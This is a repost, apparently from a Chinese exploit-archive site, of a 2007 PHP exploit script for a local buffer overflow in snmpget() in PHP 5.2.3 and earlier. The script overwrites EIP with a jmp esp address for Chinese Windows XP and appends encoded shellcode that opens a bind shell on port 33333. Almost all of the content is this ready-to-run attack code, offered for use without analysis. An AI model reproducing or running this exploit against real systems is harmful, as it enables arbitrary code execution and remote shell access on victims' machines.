首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP <= 5.2.3 snmpget() object id local Buffer Overflow eip overwrite exploit
来源:wofeiwo_at_gmail_dot_com 作者:GaRY 发布时间:2007-07-26  

<?php
//PHP <= 5.2.3 snmpget() object id local Buffer Overflow eip overwrite exploit

//by GaRY <wofeiwo_at_gmail_dot_com>
//Based on http://www.milw0rm.com/exploits/4204 by shinnai
//Just change the shellcode

//Tested on xp Pro sp2 cn

if (!extension_loaded("snmp"))
{
 if(!dl("php_snmp.dll")) die("snmp extension required!");
}

$buffer = str_repeat("A",256);

$EIP="\x12\x45\xFA\x7F"; // jmp esp 2k/xp/2003 cn
//$EIP="\xD8\x69\x83\x7C"; //call esp from kernel32.dll

$nop=str_repeat("\x90",8);

$shellcode= //bind shell on 33333
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0a".
"\x10\x7a\x0e\x83\xeb\xfc\xe2\xf4\xf6\x7a\x91\x43\xe2\xe9\x85\xf1".
"\xf5\x70\xf1\x62\x2e\x34\xf1\x4b\x36\x9b\x06\x0b\x72\x11\x95\x85".
"\x45\x08\xf1\x51\x2a\x11\x91\x47\x81\x24\xf1\x0f\xe4\x21\xba\x97".
"\xa6\x94\xba\x7a\x0d\xd1\xb0\x03\x0b\xd2\x91\xfa\x31\x44\x5e\x26".
"\x7f\xf5\xf1\x51\x2e\x11\x91\x68\x81\x1c\x31\x85\x55\x0c\x7b\xe5".
"\x09\x3c\xf1\x87\x66\x34\x66\x6f\xc9\x21\xa1\x6a\x81\x53\x4a\x85".
"\x4a\x1c\xf1\x7e\x16\xbd\xf1\x4e\x02\x4e\x12\x80\x44\x1e\x96\x5e".
"\xf5\xc6\x1c\x5d\x6c\x78\x49\x3c\x62\x67\x09\x3c\x55\x44\x85\xde".
"\x62\xdb\x97\xf2\x31\x40\x85\xd8\x55\x99\x9f\x68\x8b\xfd\x72\x0c".
"\x5f\x7a\x78\xf1\xda\x78\xa3\x07\xff\xbd\x2d\xf1\xdc\x43\x29\x5d".
"\x59\x43\x39\x5d\x49\x43\x85\xde\x6c\x78\xf8\x3b\x6c\x43\xf3\xef".
"\x9f\x78\xde\x14\x7a\xd7\x2d\xf1\xdc\x7a\x6a\x5f\x5f\xef\xaa\x66".
"\xae\xbd\x54\xe7\x5d\xef\xac\x5d\x5f\xef\xaa\x66\xef\x59\xfc\x47".
"\x5d\xef\xac\x5e\x5e\x44\x2f\xf1\xda\x83\x12\xe9\x73\xd6\x03\x59".
"\xf5\xc6\x2f\xf1\xda\x76\x10\x6a\x6c\x78\x19\x63\x83\xf5\x10\x5e".
"\x53\x39\xb6\x87\xed\x7a\x3e\x87\xe8\x21\xba\xfd\xa0\xee\x38\x23".
"\xf4\x52\x56\x9d\x87\x6a\x42\xa5\xa1\xbb\x12\x7c\xf4\xa3\x6c\xf1".
"\x7f\x54\x85\xd8\x51\x47\x28\x5f\x5b\x41\x10\x0f\x5b\x41\x2f\x5f".
"\xf5\xc0\x12\xa3\xd3\x15\xb4\x5d\xf5\xc6\x10\xf1\xf5\x27\x85\xde".
"\x81\x47\x86\x8d\xce\x74\x85\xd8\x58\xef\xaa\x66\xe5\xde\x9a\x6e".
"\x59\xef\xac\xf1\xda\x10\x7a\x0e";


$payload = $buffer.$EIP.$nop.$shellcode;

snmpget (1, 1, $payload);
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows RSH daemon 1.7 Remote
·PHP 5.2.3 tidy_parse_string()
·Entertainment CMS (Local Inclu
·IPSwitch IMail Server 2006 SEA
·PHP 5.2.3 win32std ext. safe_m
·Clever Internet ActiveX Suite
·Xserver Alpha Post Request Rem
·PHP php_gd2.dll imagepsloadfon
·MS Windows Explorer.exe Gif Im
·IPSwitch IMail Server 2006 9.1
·Zenturi NixonMyPrograms Class
·CrystalPlayer 1.98 Playlist Cr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved